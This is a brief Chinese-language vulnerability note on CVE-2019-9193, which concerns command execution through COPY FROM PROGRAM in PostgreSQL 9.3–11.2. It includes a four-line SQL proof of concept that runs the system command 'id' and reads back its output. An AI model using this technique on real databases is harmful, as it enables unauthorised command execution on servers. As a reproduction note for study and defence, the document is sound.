(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
一、漏洞简介
PostgreSQL
9.3至11.2版本中的导入导出数据命令COPY TO/FROM PROGRAM
存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。
二、漏洞影响
PostgreSQL 9.3至11.2
三、复现过程
首先连接到postgres中,并执行如下POC:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;